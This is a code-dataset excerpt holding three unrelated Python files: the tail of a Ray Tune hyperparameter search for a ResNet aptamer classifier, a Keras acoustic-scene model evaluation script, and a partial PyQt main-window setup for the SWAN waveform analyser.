storage)\n model = ResNetClassifier._load_model_state(\n ckpt, config=config)\n trainer.current_epoch = ckpt[\"epoch\"]\n else:\n model = ResNetClassifier(config, 2, 18, optimizer='adam')\n\n trainer.fit(model)\n\ndef tune_asha(datatype, num_samples=10, num_epochs=10, gpus_per_trial=0, cpus_per_trial=1):\n config = {\n \"lr\": tune.loguniform(1e-4, 1e-1),\n \"batch_size\": tune.choice([32, 64, 128]),\n \"dr\": tune.loguniform(0.005, 0.5),\n \"datatype\": datatype\n }\n\n scheduler = ASHAScheduler(\n max_t=num_epochs,\n grace_period=5,\n reduction_factor=2)\n\n reporter = CLIReporter(\n parameter_columns=[\"lr\", \"batch_size\"],\n metric_columns=[\"loss\", \"acc\", \"training_iteration\"])\n\n analysis = tune.run(\n tune.with_parameters(\n train_resnet,\n num_epochs=num_epochs,\n num_gpus=gpus_per_trial),\n resources_per_trial={\n \"cpu\": cpus_per_trial,\n \"gpu\": gpus_per_trial\n },\n metric=\"acc\",\n mode=\"max\",\n local_dir=\"./ray_results/\",\n config=config,\n num_samples=num_samples,\n scheduler=scheduler,\n progress_reporter=reporter,\n name=\"tune_res_drelu_asha\")\n\n print(\"Best hyperparameters found were: \", analysis.best_config)\n # analysis.to_csv('~/ray_results/' + config['datatype'])\n\ndef tune_asha_search(datatype, num_samples=10, num_epochs=10, gpus_per_trial=0, cpus_per_trial=1):\n config = {\n \"lr\": tune.uniform(1e-4, 1e-1),\n \"batch_size\": 64,\n \"dr\": tune.uniform(0.005, 0.5),\n \"datatype\": datatype\n }\n\n scheduler = ASHAScheduler(\n max_t=num_epochs,\n grace_period=5,\n reduction_factor=2)\n\n reporter = CLIReporter(\n parameter_columns=[\"lr\", \"batch_size\"],\n metric_columns=[\"loss\", \"acc\", \"training_iteration\"])\n\n bayesopt = BayesOptSearch(metric=\"mean_loss\", mode=\"min\")\n analysis = tune.run(\n tune.with_parameters(\n train_resnet,\n num_epochs=num_epochs,\n num_gpus=gpus_per_trial),\n resources_per_trial={\n \"cpu\": cpus_per_trial,\n \"gpu\": gpus_per_trial\n },\n metric=\"acc\",\n mode=\"max\",\n local_dir=\"./ray_results/\",\n config=config,\n num_samples=num_samples,\n search_alg=bayesopt,\n scheduler=scheduler,\n progress_reporter=reporter,\n name=\"tune_res_drelu_bayopt\")\n\n print(\"Best hyperparameters found were: \", analysis.best_config)\n # analysis.to_csv('~/ray_results/' + config['datatype'])\n\ndef exp_results_check(checkpoint_path, result_path, title):\n # example\n # checkpoint_file = './ray_results/tune_vae_asha/train_vae_a45d1_00000_0_batch_size=64,dr=0.029188,lr=0.0075796,z_dim=10_2021-07-13_12-50-57/checkpoints/epoch=28-step=15891.ckpt'\n checkpoint_file = checkpoint_path\n param_file = open(result_path, 'r')\n check_epoch = int(checkpoint_file.split(\"epoch=\", 1)[1].split('-', 1)[0])\n resultjsons = param_file.read().split('\\n')\n results = json.loads(resultjsons[check_epoch + 1])\n params = results['config']\n lr = params['lr']\n dr = params['dr']\n batch_size = params['batch_size']\n datatype = params['datatype']\n\n con = {'lr': lr, 'dr': dr, 'batch_size': batch_size, 'datatype': datatype}\n model = ResNetClassifier(con, 2, 18, optimizer='adam')\n\n checkpoint = torch.load(checkpoint_file)\n model.prepare_data()\n model.criterion.weight = torch.tensor([0., 0.]) # need to add as this is saved by the checkpoint file\n model.load_state_dict(checkpoint['state_dict'])\n\n model.eval()\n test_set = m.test_set_corr\n verdict = {'sequence':list(test_set.keys()), 'binary':list(test_set.values())}\n _verification = pd.DataFrame(verdict)\n ver_reader = m.NAReader(_verification, shuffle=False)\n\n ver_loader = torch.utils.data.DataLoader(\n ver_reader,\n batch_size=len(test_set.keys()),\n collate_fn=m.my_collate,\n # num_workers=4,\n # pin_memory=True,\n shuffle=False\n )\n\n for i, batch in enumerate(ver_loader):\n seqs, ohe, labels = batch\n softmax = model(ohe)\n\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = labels\n # ver_acc = sklearn.metrics.balanced_accuracy_score(ycpu, predcpu)\n # Make confusion Matrix\n y_true = ycpu.detach().cpu().numpy().astype('bool').tolist()\n y_pred = np.asarray(predcpu, dtype=np.bool).tolist()\n score = np.asarray([1 if x == y_pred[xid] else 0 for xid, x in enumerate(y_true)])\n ver_acc = np.mean(score)\n f1 = sklearn.metrics.f1_score(y_true, y_pred)\n\n cm = sklearn.metrics.confusion_matrix(y_true, y_pred, normalize='true')\n df_cm = pd.DataFrame(cm, index=[0, 1], columns=[0, 1])\n plt.figure(figsize=(10, 7))\n ax = plt.subplot()\n seaborn.set(font_scale=3.0)\n seaborn.heatmap(df_cm, annot=True, ax=ax)\n label_font = {'size': '26'}\n ax.tick_params(axis='both', which='major', labelsize=40)\n ax.xaxis.set_ticklabels([\"0\", \"1\"])\n ax.yaxis.set_ticklabels([\"0\", \"1\"])\n # plt.title(title)\n plt.savefig('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title)\n\n o = open('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title + 'results.txt', \"w+\")\n print(\"Validation Loss\", results['loss'], file=o)\n print(\"Validation Accuracy\", results['acc'], file=o)\n print(\"Verification Accuracy:\", ver_acc, \"of dataset size:\", len(test_set.keys()), file=o)\n print(\"F1-score\", f1, file=o)\n o.close()\n\ndef exp_results_check_progress(checkpoint_path, hparams, progress, title):\n # example\n checkpoint_file = checkpoint_path\n # param_file = open(result_path, 'r')\n # check_epoch = int(checkpoint_file.split(\"epoch=\", 1)[1].split('-', 1)[0])\n # resultjsons = param_file.read().split('\\n')\n o = open(hparams, 'r')\n params = json.load(o)\n # params = results['config']\n lr = params['lr']\n dr = params['dr']\n batch_size = params['batch_size']\n datatype = params['datatype']\n\n progress = pd.read_csv(progress)\n loss = progress.iloc[-1].loss\n acc = progress.iloc[-1].acc\n\n con = {'lr': lr, 'dr': dr, 'batch_size': batch_size, 'datatype': datatype}\n model = ResNetClassifier(con, 2, 18, optimizer='adam')\n\n checkpoint = torch.load(checkpoint_file)\n model.prepare_data()\n model.criterion.weight = torch.tensor([0., 0.]) # need to add as this is saved by the checkpoint file\n model.load_state_dict(checkpoint['state_dict'])\n\n model.eval()\n test_set = m.test_set_corr\n verdict = {'sequence': list(test_set.keys()), 'binary': list(test_set.values())}\n _verification = pd.DataFrame(verdict)\n ver_reader = m.NAReader(_verification, shuffle=False)\n\n\n ver_loader = torch.utils.data.DataLoader(\n ver_reader,\n batch_size=len(test_set.keys()),\n collate_fn=m.my_collate,\n # num_workers=4,\n # pin_memory=True,\n shuffle=False\n )\n\n for i, batch in enumerate(ver_loader):\n seqs, ohe, labels = batch\n softmax = model(ohe)\n\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = labels\n # ver_acc = sklearn.metrics.balanced_accuracy_score(ycpu, predcpu)\n\n # Make confusion Matrix\n y_true = ycpu.detach().cpu().numpy().astype('bool').tolist()\n y_pred = np.asarray(predcpu, dtype=np.bool).tolist()\n score = np.asarray([1 if x == y_pred[xid] else 0 for xid, x in enumerate(y_true)])\n ver_acc = np.mean(score)\n f1 = sklearn.metrics.f1_score(y_true, y_pred)\n\n cm = sklearn.metrics.confusion_matrix(y_true, y_pred, normalize='true')\n df_cm = pd.DataFrame(cm, index=[0, 1], columns=[0, 1])\n plt.figure(figsize=(10, 7))\n ax = plt.subplot()\n seaborn.set(font_scale=3.0)\n seaborn.heatmap(df_cm, annot=True, ax=ax)\n label_font = {'size': '26'}\n ax.tick_params(axis='both', which='major', labelsize=40)\n ax.xaxis.set_ticklabels([\"0\", \"1\"])\n ax.yaxis.set_ticklabels([\"0\", \"1\"])\n # plt.title(title)\n plt.savefig('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title)\n\n o = open('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title + 'results.txt', \"w+\")\n print(\"Validation Loss\", loss, file=o)\n print(\"Validation Accuracy\", acc, file=o)\n print(\"Verification Accuracy:\", ver_acc, \"of dataset size:\", len(test_set.keys()), file=o)\n print(\"F1-score\", f1, file=o)\n o.close()\n\ndef val_results_check(checkpoint_path, hparams, progress, result_path, title, r=True):\n # example\n # checkpoint_file = './ray_results/tune_vae_asha/train_vae_a45d1_00000_0_batch_size=64,dr=0.029188,lr=0.0075796,z_dim=10_2021-07-13_12-50-57/checkpoints/epoch=28-step=15891.ckpt'\n checkpoint_file = checkpoint_path\n if r:\n param_file = open(result_path, 'r')\n check_epoch = int(checkpoint_file.split(\"epoch=\", 1)[1].split('-', 1)[0])\n resultjsons = param_file.read().split('\\n')\n results = json.loads(resultjsons[check_epoch + 1])\n params = results['config']\n lr = params['lr']\n dr = params['dr']\n batch_size = params['batch_size']\n datatype = params['datatype']\n loss = results['loss']\n acc = results['acc']\n else:\n o = open(hparams, 'r')\n params = json.load(o)\n # params = results['config']\n lr = params['lr']\n dr = params['dr']\n batch_size = params['batch_size']\n datatype = params['datatype']\n\n progress = pd.read_csv(progress)\n loss = progress.iloc[-1].loss\n acc = progress.iloc[-1].acc\n\n con = {'lr': lr, 'dr': dr, 'batch_size': batch_size, 'datatype': datatype}\n model = ResNetClassifier(con, 2, 18, optimizer='adam')\n\n checkpoint = torch.load(checkpoint_file)\n model.prepare_data()\n model.criterion.weight = torch.tensor([0., 0.]) # need to add as this is saved by the checkpoint file\n model.load_state_dict(checkpoint['state_dict'])\n\n model.eval()\n vd = model.val_dataloader()\n\n yt, yp = [], []\n for i, batch in enumerate(vd):\n seqs, ohe, labels = batch\n softmax = model(ohe)\n\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = labels\n\n\n # Make confusion Matrix\n y_true = ycpu.detach().cpu().numpy().astype('bool').tolist()\n y_pred = np.asarray(predcpu, dtype=np.bool).tolist()\n yt += y_true\n yp += y_pred\n\n ver_acc = np.mean(np.asarray([1 if x == yp[xid] else 0 for xid, x in enumerate(yt)]))\n # ver_acc = sklearn.metrics.balanced_accuracy_score(yt, yp)\n cm = sklearn.metrics.confusion_matrix(yt, yp, normalize='true')\n df_cm = pd.DataFrame(cm, index=[0, 1], columns=[0, 1])\n plt.figure(figsize=(10, 7))\n ax = plt.subplot()\n seaborn.set(font_scale=3.0)\n seaborn.heatmap(df_cm, annot=True, ax=ax)\n label_font = {'size': '26'}\n ax.tick_params(axis='both', which='major', labelsize=40)\n ax.xaxis.set_ticklabels([\"0\", \"1\"])\n ax.yaxis.set_ticklabels([\"0\", \"1\"])\n # plt.title(title)\n plt.savefig('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title + \"_VER\")\n\n o = open('../../Dropbox (ASU)/Projects/Aptamer_ML/' + title + 'results_ver.txt', \"w+\")\n print(\"Validation Loss\", loss, file=o)\n print(\"Validation Accuracy\", acc, file=o)\n print(\"Verification Accuracy:\", ver_acc, \"of dataset size:\", len(yt), file=o)\n o.close()\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Resnet Training on Aptamer Dataset\")\n parser.add_argument('dataset', type=str, help=\"3-7 letter/number abbreviation describing subset of the data to use\")\n parser.add_argument('cpus_per_trial', type=str, help=\"Number of cpus available to each trial in Ray Tune\")\n parser.add_argument('gpus_per_trial', type=str, help=\"Number of gpus available to each trial in Ray Tune\")\n parser.add_argument('samples', type=str, help=\"Number of Ray Tune Samples\")\n args = parser.parse_args()\n os.environ[\"SLURM_JOB_NAME\"] = \"bash\"\n\n tune_asha(args.dataset, int(args.samples), 30, gpus_per_trial=int(args.gpus_per_trial), cpus_per_trial=int(args.cpus_per_trial))\n # tune_asha_search(args.dataset, int(args.samples), 50, gpus_per_trial=int(args.gpus_per_trial), cpus_per_trial=int(args.cpus_per_trial))\n\n ### Debugging\n # con = {'lr': 1e-4, 'dr': 0.1, 'batch_size': 32, 'datatype': 'HCL'}\n #\n # model = ResNetClassifier(con, 2, 18)\n #\n ## Single Loop debugging\n # model.prepare_data()\n # d = model.train_dataloader()\n # for i, batch in enumerate(d):\n # if i > 0:\n # break\n # else:\n # model.training_step(batch, i)\n\n # pytorch lightning loop\n # rn = ResNetClassifier(con, 2, 18, optimizer='adam')\n # plt = pl.Trainer(gpus=1)\n # plt.fit(rn)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"} {"ext": "py", "sha": "1a30bda7eaa99fc763bc21d8b15291df971feba6", "content": "##### For testing the original keras model, which is saved as .hdf5 format.\n\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\nimport numpy as np\nimport h5py\nimport scipy.io\nimport pandas as pd\nimport librosa\nimport soundfile as sound\nimport keras\nimport tensorflow\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import log_loss\nimport sys\nsys.path.append(\"..\")\nfrom utils import *\nfrom funcs import *\n\nfrom tensorflow import ConfigProto\nfrom tensorflow import InteractiveSession\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\n\nval_csv = 'data_2020/evaluation_setup/fold1_evaluate.csv'\nfeat_path = 'features/logmel128_scaled_d_dd/'\nmodel_path = '../pretrained_models/smallfcnn-model-0.9618.hdf5'\n\nnum_freq_bin = 128\nnum_classes = 3\n\ndata_val, y_val = load_data_2020(feat_path, val_csv, num_freq_bin, 'logmel')\ny_val_onehot = keras.utils.to_categorical(y_val, num_classes)\n\nprint(data_val.shape)\nprint(y_val.shape)\n\nbest_model = keras.models.load_model(model_path)\npreds = best_model.predict(data_val)\n\ny_pred_val = np.argmax(preds,axis=1)\n\nover_loss = log_loss(y_val_onehot, preds)\noverall_acc = np.sum(y_pred_val==y_val) / data_val.shape[0]\n\nprint(y_val_onehot.shape, preds.shape)\nnp.set_printoptions(precision=3)\n\nprint(\"\\n\\nVal acc: \", \"{0:.3f}\".format(overall_acc))\nprint(\"Val log loss:\", \"{0:.3f}\".format(over_loss))\n\nconf_matrix = confusion_matrix(y_val,y_pred_val)\nprint(\"\\n\\nConfusion matrix:\")\nprint(conf_matrix)\nconf_mat_norm_recall = conf_matrix.astype('float32')/conf_matrix.sum(axis=1)[:,np.newaxis]\nrecall_by_class = np.diagonal(conf_mat_norm_recall)\nmean_recall = np.mean(recall_by_class)\n\ndev_test_df = pd.read_csv(val_csv,sep='\\t', encoding='ASCII')\nClassNames = np.unique(dev_test_df['scene_label'])\n\nprint(\"Class names:\", ClassNames)\nprint(\"Per-class val acc: \",recall_by_class, \"\\n\\n\")\n\n\n\n\n\n"} {"ext": "py", "sha": "1a30be050f88378838d51722197d6a1666cd1271", "content": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 2 23:26:08 2017\n\n@author: Shashwat Sridhar\n\"\"\"\n# system imports\nfrom pyqtgraph.Qt import QtCore, QtGui, QtWidgets\nfrom os import sep\n\n# swan-specific imports\nfrom swan.views.mean_waveforms_view import PgWidget2d\nfrom swan.views.virtual_units_view import VirtualUnitsView\nfrom swan.widgets.plot_grid import MyPlotGrid\nfrom swan.views.isi_histograms_view import PgWidgetISI\nfrom swan.views.pca_3d_view import PgWidgetPCA\nfrom swan.views.rate_profile_view import PgWidgetRateProfile\nfrom swan.widgets.plot_grid_tools import PlotGridTools\nfrom swan.widgets.view_toolbar import CollapsibleWidget\n\nfrom swan.resources import icons\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _from_utf_8(s):\n return s\n\ntry:\n _encoding = QtWidgets.QApplication.UnicodeUTF8\n\n\n def _translate(context, text, disambig):\n return QtWidgets.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtWidgets.QApplication.translate(context, text, disambig)\n\n\nclass MainUI(object):\n def __init__(self, main_application):\n main_application.setObjectName(_from_utf_8(\"Main\"))\n\n main_application.setDockOptions(QtWidgets.QMainWindow.AllowTabbedDocks |\n QtWidgets.QMainWindow.AllowNestedDocks |\n QtWidgets.QMainWindow.GroupedDragging)\n\n self.plotGridDock = QtWidgets.QDockWidget(\"Plot Grid\")\n self.plotGridDock.setObjectName(_from_utf_8(\"PlotGridDock\"))\n self.plotGrid = MyPlotGrid(main_application)\n self.plotGridDock.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.plotGridDock.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n self.plotGridDock.setWidget(self.plotGrid)\n\n self.dock_virtual_unit_view = QtWidgets.QDockWidget(\"Virtual Unit Mappings\")\n self.dock_virtual_unit_view.setObjectName(_from_utf_8(\"virtualUnitsDock\"))\n self.dock_virtual_unit_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_virtual_unit_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.virtual_units_view = VirtualUnitsView()\n self.virtual_units_view.setObjectName(_from_utf_8(\"virtualUnitsView\"))\n\n self.dock_virtual_unit_view.setWidget(self.virtual_units_view)\n\n self.dock_mean_waveforms_view = QtWidgets.QDockWidget(\"Mean Waveforms\")\n self.dock_mean_waveforms_view.setObjectName(_from_utf_8(\"meanWaveformView\"))\n self.dock_mean_waveforms_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_mean_waveforms_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.mean_waveforms_view = PgWidget2d()\n self.mean_waveforms_view.setObjectName(_from_utf_8(\"meanWaveformsView\"))\n\n self.dock_mean_waveforms_view.setWidget(self.mean_waveforms_view)\n\n self.dock_isi_histograms_view = QtWidgets.QDockWidget(\"ISI Histograms\")\n self.dock_isi_histograms_view.setObjectName(_from_utf_8(\"ISIHView\"))\n self.dock_isi_histograms_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_isi_histograms_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.isi_histograms_view = PgWidgetISI()\n self.isi_histograms_view.setObjectName(_from_utf_8(\"IsihView\"))\n\n self.dock_isi_histograms_view.setWidget(self.isi_histograms_view)\n\n self.dock_pca_3d_view = QtWidgets.QDockWidget(\"Principal Component Analysis\")\n self.dock_pca_3d_view.setObjectName(_from_utf_8(\"PCAView\"))\n self.dock_pca_3d_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_pca_3d_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.pca_3d_view = PgWidgetPCA()\n self.pca_3d_view.setObjectName(_from_utf_8(\"PcaView\"))\n\n self.dock_pca_3d_view.setWidget(self.pca_3d_view)\n\n self.dock_rate_profiles_view = QtWidgets.QDockWidget(\"Rate Profiles\")\n self.dock_rate_profiles_view.setObjectName(_from_utf_8(\"RateProfiles\"))\n self.dock_rate_profiles_view.setFeatures(QtWidgets.QDockWidget.DockWidgetMovable |\n QtWidgets.QDockWidget.DockWidgetFloatable)\n self.dock_rate_profiles_view.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)\n\n self.rate_profiles_view = PgWidgetRateProfile()\n self.rate_profiles_view.setObjectName(_from_utf_8(\"RateProfileView\"))\n\n self.dock_rate_profiles_view.setWidget(self.rate_profiles_view)\n\n self.tools = PlotGridTools()\n\n self.plotGridOptionsLayout = QtWidgets.QGridLayout()\n self.plotGridOptionsLayout.setObjectName(_from_utf_8(\"PlotGridOptionsLayout\"))\n\n self.plotGridOptionsLayout.addWidget(self.tools)\n self.plotGridOptions = CollapsibleWidget(parent=self.plotGrid, title=\"Options\", animation_duration=400)\n self.plotGridOptions.set_content_layout(self.plotGridOptionsLayout)\n\n self.plotGrid.main_grid_layout.addWidget(self.plotGridOptions, 1, 0)\n self.plotGrid.main_grid_layout.setRowStretch(0, 10)\n\n self.menu_bar = QtWidgets.QMenuBar(main_application)\n self.menu_bar.setGeometry(QtCore.QRect(0, 0, 1159, 25))\n self.menu_bar.setObjectName(_from_utf_8(\"menubar\"))\n self.menu_File = QtWidgets.QMenu(self.menu_bar)\n self.menu_File.setObjectName(_from_utf_8(\"menu_File\"))\n self.menu_Edit = QtWidgets.QMenu(self.menu_bar)\n self.menu_Edit.setObjectName(_from_utf_8(\"menu_Edit\"))\n self.menu_Help = QtWidgets.QMenu(self.menu_bar)\n self.menu_Help.setObjectName(_from_utf_8(\"menu_Help\"))\n self.menu_View = QtWidgets.QMenu(self.menu_bar)\n self.menu_View.setObjectName(_from_utf_8(\"menu_View\"))\n main_application.setMenuBar(self.menu_bar)\n self.statusbar = QtWidgets.QStatusBar(main_application)\n self.statusbar.setObjectName(_from_utf_8(\"statusbar\"))\n main_application.setStatusBar(self.statusbar)\n self.toolbar = QtWidgets.QToolBar(main_application)\n self.toolbar.setObjectName(_from_utf_8(\"toolBar\"))\n main_application.addToolBar(QtCore.Qt.TopToolBarArea, self.toolbar)\n self.action_new_project = QtWidgets.QAction(main_application)\n self.action_new_project.setObjectName(_from_utf_8(\"action_new_project\"))\n self.action_load_project = QtWidgets.QAction(main_application)\n self.action_load_project.setObjectName(_from_utf_8(\"action_load_project\"))\n self.action_save_project = QtWidgets.QAction(main_application)\n self.action_save_project.setObjectName(_from_utf_8(\"action_save_project\"))\n self.action_quit = QtWidgets.QAction(main_application)\n self.action_quit.setObjectName(_from_utf_8(\"action_quit\"))\n self.action_swap = QtWidgets.QAction(main_application)\n self.action_swap.setObjectName(_from_utf_8(\"action_swap\"))\n self.action_collapse = QtWidgets.QAction(main_application)\n self.action_collapse.setObjectName(_from_utf_8(\"action_collapse\"))\n self.action_recalculate_mapping = QtWidgets.QAction(main_application)\n self.action_recalculate_mapping.setObjectName(_from_utf_8(\"action_recalculate_mapping\"))\n self.action_save_as = QtWidgets.QAction(main_application)\n self.action_save_as.setObjectName(_from_utf_8(\"action_save_as\"))\n self.action_load_connector_map = QtWidgets.QAction(main_application)\n self.action_load_connector_map.setObjectName(_from_utf_8(\"action_load_connector_map\"))\n self.action_zoom_in = QtWidgets.QAction(main_application)\n self.action_zoom_in.setObjectName(_from_utf_8(\"action_zoom_in\"))\n self.action_zoom_out = QtWidgets.QAction(main_application)\n self.action_zoom_out.setObjectName(_from_utf_8(\"action_zoom_out\"))\n self.action_revert_mapping = QtWidgets.QAction(main_application)\n self.action_revert_mapping.setObjectName(_from_utf_8(\"action_revert_mapping\"))\n self.action_collapse_overview = QtWidgets.QAction(main_application)\n self.action_collapse_overview.setObjectName(_from_utf_8(\"action_collapse_overview\"))\n self.action_expand_overview = QtWidgets.QAction(main_application)\n self.action_expand_overview.setObjectName(_from_utf_8(\"action_expand_overview\"))\n self.action_preferences = QtWidgets.QAction(main_application)\n self.action_preferences.setObjectName(_from_utf_8(\"action_preferences\"))\n self.action_about = QtWidgets.QAction(main_application)\n self.action_about.setObjectName(_from_utf_8(\"action_about\"))\n self.action_tutorials = QtWidgets.QAction(main_application)\n self.action_tutorials.setObjectName(_from_utf_8(\"action_tutorials\"))\n self.action_export_to_csv = QtWidgets.QAction(main_application)\n self.action_export_to_csv.setObjectName(_from_utf_8(\"action_export_to_csv\"))\n self.action_export_to_odml = QtWidgets.QAction(main_application)\n self.action_export_to_odml.setObjectName(_from_utf_8(\"action_export_to_odml\"))\n self.action_import_from_csv = QtWidgets.QAction(main_application)\n self.action_import_from_csv.setObjectName(_from_utf_8(\"action_import_from_csv\"))\n self.action_import_from_od_ml = QtWidgets.QAction(main_application)\n self.action_import_from_od_ml.setObjectName(_from_utf_8(\"action_import_from_od_ml\"))\n self.action_revert_state = QtWidgets.QAction(main_application)\n self.action_revert_state.setObjectName(_from_utf_8(\"action_revert_state\"))\n self.action_restore_state = QtWidgets.QAction(main_application)\n self.action_restore_state.setObjectName(_from_utf_8(\"action_restore_state\"))\n self.action_save_state = QtWidgets.QAction(main_application)\n self.action_save_state.setObjectName(_from_utf_8(\"action_save_state\"))\n\n self.menu_File.addAction(self.action_new_project)\n self.menu_File.addAction(self.action_load_project)\n self.menu_File.addAction(self.action_save_project)\n self.menu_File.addAction(self.action_save_as)\n self.menu_File.addSeparator()\n self.menu_File.addAction(self.action_load_connector_map)\n self.menu_File.addAction(self.action_export_to_csv)\n self.menu_File.addAction(self.action_export_to_odml)\n self.menu_File.addSeparator()\n self.menu_File.addAction(self.action_quit)\n\n self.menu_Edit.addAction(self.action_recalculate_mapping)\n self.menu_Edit.addAction(self.action_revert_mapping)\n self.menu_Edit.addAction(self.action_swap)\n self.menu_Edit.addSeparator()\n self.menu_Edit.addAction(self.action_zoom_in)\n self.menu_Edit.addAction(self.action_zoom_out)\n self.menu_Edit.addAction(self.action_expand_overview)\n self.menu_Edit.addAction(self.action_collapse_overview)\n self.menu_Edit.addSeparator()\n self.menu_Edit.addAction(self.action_preferences)\n\n self.menu_Help.addAction(self.action_tutorials)\n self.menu_Help.addAction(self.action_about)\n self.menu_View.addAction(self.action_save_state)\n self.menu_View.addAction(self.action_restore_state)\n self.menu_View.addAction(self.action_revert_state)\n\n self.menu_bar.addAction(self.menu_File.menuAction())\n self.menu_bar.addAction(self.menu_Edit.menuAction())\n self.menu_bar.addAction(self.menu_View.menuAction())\n self.menu_bar.addAction(self.menu_Help.menuAction())\n\n self.toolbar.addAction(self.action_new_project)\n self.toolbar.addAction(self.action_load_project)\n self.toolbar.addAction(self.action_save_project)\n self.toolbar.addAction(self.action_save_as)\n self.toolbar.addAction(self.action_preferences)\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.action_revert_mapping)\n self.toolbar.addAction(self.action_swap)\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.action_zoom_in)\n self.toolbar.addAction(self.action_zoom_out)\n self.toolbar.addAction(self.action_expand_overview)\n self.toolbar.addAction(self.action_collapse_overview)\n\n self.load_icons()\n self.retranslate_ui(main_application)\n\n main_application.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.plotGridDock, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.dock_virtual_unit_view, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.dock_rate_profiles_view, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.dock_pca_3d_view, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.dock_mean_waveforms_view, QtCore.Qt.Vertical)\n main_application.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.dock_isi_histograms_view, QtCore.Qt.Vertical)\n\n main_application.splitDockWidget(self.plotGridDock, self.dock_virtual_unit_view, QtCore.Qt.Horizontal)\n main_application.splitDockWidget(self.dock_virtual_unit_view, self.dock_rate_profiles_view, QtCore.Qt.Horizontal)\n main_application.splitDockWidget(self.dock_rate_profiles_view, self.dock_pca_3d_view, QtCore.Qt.Vertical)\n\n # self.action_quit.triggered.connect(main_application.close)\n QtCore.QMetaObject.connectSlotsByName(main_application)\n\n @staticmethod\n def set_program_title(main_application, text):\n main_application.setWindowTitle(_translate(\"main_application\", text, None))\n\n def retranslate_ui(self, main_application):\n main_application.setWindowTitle(_translate(\"main_application\", \"SWAN - Sequential waveform analyser\", None))\n self.menu_File.setTitle(_translate(\"main_application\", \"&File\", None))\n self.menu_Edit.setTitle(_translate(\"main_application\", \"&Edit\", None))\n self.menu_Help.setTitle(_translate(\"main_application\", \"&Help\", None))\n self.menu_View.setTitle(_translate(\"main_application\", \"&View\", None))\n self.toolbar.setWindowTitle(_translate(\"main_application\", \"toolBar\", None))\n self.action_new_project.setText(_translate(\"main_application\", \"&New Project...\", None))\n self.action_new_project.setIconText(_translate(\"main_application\", \"New Project...\", None))\n self.action_new_project.setToolTip(_translate(\"main_application\", \"Create a new project\", None))\n self.action_new_project.setShortcut(_translate(\"main_application\", \"Ctrl+N\", None))\n self.action_load_project.setText(_translate(\"main_application\", \"&Load Project...\", None))\n self.action_load_project.setIconText(_translate(\"main_application\", \"Load Project...\", None))\n self.action_load_project.setToolTip(_translate(\"main_application\", \"Load project from file\", None))\n self.action_load_project.setShortcut(_translate(\"main_application\", \"Ctrl+O\", None))\n self.action_save_project.setText(_translate(\"main_application\", \"&Save Project\", None))\n self.action_save_project.setIconText(_translate(\"main_application\", \"Save Project\", None))\n self.action_save_project.setToolTip(_translate(\"main_application\", \"Save project\", None))\n self.action_save_project.setShortcut(_translate(\"main_application\", \"Ctrl+S\", None))\n self.action_quit.setText(_translate(\"main_application\", \"&Quit\", None))\n self.action_quit.setToolTip(_translate(\"main_application\", \"Close this application\", None))\n self.action_quit.setShortcut(_translate(\"main_application\", \"Ctrl+Q\", None))\n self.action_swap.setText(_translate(\"main_application\", \"Swap\", None))\n self.action_swap.setToolTip(_translate(\"main_application\", \"Swap two selected units\", None))\n self.action_collapse.setText(_translate(\"main_application\", \"Collapse\", None))\n self.action_collapse.setToolTip(_translate(\"main_application\", \"Collapse selected unit row(s)\", None))\n self.action_recalculate_mapping.setText(_translate(\"main_application\", \"Recalculate mapping...\", None))\n self.action_recalculate_mapping.setToolTip(_translate(\"main_application\", \"Try to find a mapping automatically\",\n None))\n self.action_save_as.setText(_translate(\"main_application\", \"Save project as...\", None))\n self.action_save_as.setToolTip(_translate(\"main_application\", \"Save project to a new file\", None))\n self.action_load_connector_map.setText(_translate(\"main_application\", \"Load connector map...\", None))\n 